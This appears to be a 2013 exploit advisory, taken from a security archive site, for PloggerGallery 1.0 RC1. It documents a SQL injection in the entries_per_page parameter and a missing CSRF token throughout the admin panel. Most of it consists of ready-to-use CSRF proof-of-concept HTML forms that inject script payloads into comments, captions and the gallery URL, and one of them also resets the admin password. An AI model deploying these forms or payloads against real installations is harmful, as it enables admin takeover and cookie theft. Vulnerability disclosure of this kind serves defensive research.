PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection

PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection: Posted Mar 2, 2013; Authored by Saadat Ullah; PloggerGallery version 1.0 RC1 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection, csrf; SHA-256 | 1bfcd734660e2193dcc1800a50a9d5db1ac4f50417dc7f4e8302d7a7d5904aec; Download | Favorite | View

PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection

-------------------------------------------------------------------------
# Software      : PloggerGallery Version 1.0 RC1                                                                                                                      
# Author        : Saadat Ullah                                              
# Date          : 2/3/13   
# Dork          : Use Ur Mind  
# Software Link : http://www.plogger.org/download/                                                                                        
-------------------------------------------------------------------------
+---+[ Feedback.php Sqli ]+---+

Injectable On entries_per_pag Parameter In Feedback.php

http://localhost/plogger/plog-admin/plog-feedback.php?entries_per_page=5'

p0c

if (isset($_REQUEST['entries_per_page'])) {
    $_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
  } else if (!isset($_SESSION['entries_per_page'])) {
    $_SESSION['entries_per_page'] = 20;
  }
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.

// Generate javascript init function for ajax editing
  $query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
  $result = run_query($query);

+---+[ CSRF In Admin Panel ]+---+

Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..

+---+[ XSS ]+---+

Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..

XSS
http://localhost/plogger/plog-admin/plog-feedback.php
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.


Uploading the File and enter name to any XSS Vector..

http://localhost/plogger/plog-admin/plog-upload.php

It Can Me Exploit IN Many Ways LIke
CSRF + SQLI inside Admin panel..which Is define above.

XSS In Edit Comment.CSRF + XSS

<html>
<head>
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-feedback.php" method="post">
    <div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
    <div>
      <div class="strong">Edit Comment</div>
      <p>
        <label class="strong" accesskey="a" for="author">Author:</label><br />
        <input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
      </p>
      <p>
        <label class="strong" accesskey="e" for="email">Email:</label><br />
        <input size="65" name="email" id="email" value="asdf@localhost.com" type="hidden"/>
      </p>
      <p>
        <label class="strong" accesskey="u" for="url">Website:</label><br />
        <input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
      </p>
      <p>
        <label class="strong" accesskey="c" for="comment">Comment:</label><br />
        <textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
      </p>
      <input type="hidden" name="pid" value="4" />
      <input type="hidden" name="action" value="update-comment" />
      <input class="submit" name="update" value="Update" type="submit" />
      <input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
    </div>
  </form>


Another XSS
http://localhost/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit Caption To XSS Vector Inside Admin PAnel..
Again CSRF + XSS
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
      <div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
      <div>
        <div class="strong">Edit Image Properties</div>
        <p>
          <label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
          <input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
        </p>
        <p>
          <label class="strong" for="description">Description:</label><br />
          <textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
        </p>
        <p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
        <input type="hidden" name="pid" value="1" />
        <input type="hidden" name="action" value="update-picture" />
        <input class="submit" name="update" value="Update" type="submit" />
        <input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
      </div>
    </form>


CSRF Admin Password Reset And XSS

plog-options.php

<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="localhost@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
            <td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>

--------------------------------------------------------
# Email - saadi_linux@rocketmail.com
# GreeTz 2 All Pakistani Security Researchers 
# Home -  http://security-geeks.blogspot.com
---------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection

PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection

Share This

PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems